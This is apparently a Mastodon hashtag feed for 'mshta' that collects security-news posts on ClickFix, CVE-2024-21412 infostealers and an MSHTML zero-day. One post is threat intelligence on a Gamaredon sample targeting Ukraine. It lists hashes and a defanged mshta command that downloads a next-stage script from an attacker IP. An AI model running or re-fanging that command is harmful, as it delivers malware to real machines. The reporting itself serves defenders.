fosstodon.org is one of the many independent Mastodon servers you can use to participate in the fediverse.
Fosstodon is an invite only Mastodon instance that is open to those who are interested in technology; particularly free & open source software. If you wish to join, contact us for an invite.

#mshta

KrebsOnSecurity RSS
ClickFix: How to Infect Your PC in Three Easy Steps
https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/
#U.S.DepartmentofHealthandHumanServices #MicrosoftWindows #MicrosoftOffice #GoogleChrome #booking.com #ArcticWolf #proofpoint #mshta.exe #ClickFix #Facebook #Other

ITSEC News
ClickFix: How to Infect Your PC in Three Easy Steps - A clever malware deployment scheme first spotted in targeted attacks last year has...
https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/
#u.s.departmentofhealthandhumanservices #microsoftwindows #microsoftoffice #googlechrome #booking.com #arcticwolf #proofpoint #mshta.exe #clickfix #facebook #other

Pyrzout :vm:
ClickFix: How to Infect Your PC in Three Easy Steps
https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/
#U.S.DepartmentofHealthandHumanServices #MicrosoftWindows #MicrosoftOffice #GoogleChrome #booking.com #ArcticWolf #proofpoint #mshta.exe #ClickFix #Facebook #Other

卡拉今天看了什麼
Internet shortcut file security feature bypass vulnerability exploited for more than a year; attackers use it to distribute several infostealers | iThome
Link: https://www.ithome.com.tw/news/164159

📌 Summary:
Microsoft patched the Internet shortcut file security bypass vulnerability CVE-2024-21412 in its routine update in February this year, but hackers have been using the vulnerability to distribute multiple infostealers, with attacks spanning North America, Spain and Thailand. In its analysis, security vendor Fortinet found that the attackers craft malicious URL files pointing to a specific remote server and download an LNK file to the victim's computer, luring the victim into running that file to advance the attack. The researchers saw the hackers use two different code injection tools to bypass defenses, ultimately planting infostealers on the victim's computer.

🎯 Key Points:
1. Microsoft patched the Internet shortcut file security bypass vulnerability CVE-2024-21412 in February this year, but hackers use it to distribute infostealers.
2. Security vendor Fortinet found that the attackers craft malicious URL files pointing to a specific remote server and lure victims into running them to advance the attack.
3. The researchers saw the hackers use two code injection tools, ultimately planting infostealers on the victim's computer.
4. Fortinet found that the hackers use the Steam community site as a Dead Drop Resolver to hide the C2 source.

🔖 Keywords:
#CVE-2024-21412
#Fortinet
#Water Hydra
#Lumma Stealer
#Meduza Stealer
#ACR Stealer
#PowerShell
#HTA指令碼 (HTA script)
#Edge主程式圖示 (Edge main program icon)
#LNK檔案 (LNK file)
#forfiles
#mshta
#Imghippo
#GdipBitmapGetPixel
#HijackLoader
#Steam社群網站 (Steam community site)
#Dead Drop Resolver
#Docker
#AuthZ
#OpenAI
#GPT-4o mini
#Meta Llama 3

Pyrzout :vm:
0-day in Windows MSHTML used in malware attacks
https://blog.elhacker.net/2024/07/0-day-en-windows-mshtml-malware.html
#Malware #MSHTML #0-day #MSHTA

Dmitry Bestuzhev
A very fresh #Gamaredon TA sample from today (Jan 23, 2022) targeting the Directorate General For Rendering Services To Diplomatic Missions of #Ukraine:

Original email: afb612d08112c036628a29ed8d4bd4550ca7cfed2582e2f432f2283a9b507f15

Attachment:
d124919de870b5974639ba24dd80709ed890119bdec4ba6a6179464fca4ef952 *Запит.tar

Extracted malicious LNK:
600ef7861ad03b434d98312a4133dc33fa1944f43c2e558044dfcdb342803147 *Відповідно_до_статті_20_Закону,_просимо_надати_відповідь_протягом_5_робочих_днів_з_дня_отримання_запиту.lnk
dropping a next stage #vbscript via #mshta

%windir%\system32\mshta[.]exe http://194.180.174[.]203/23.01/mo/baseball[.]DjVu

284bd873c840415ee24738f0a866b558d51f5f58b6bf29fb2818ffb819f9bd04 *baseball.DjVu

Once deobfuscated it leads to a #Telegram channel providing with the next state IP:
b7422446c22baee16c6c9c00a82610f739b836648ffce070bbd6c932db5416f5 *baseball.DjVu.deobfuscated

We have a full paper of this Telegram multi-staging technique published last week here: https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations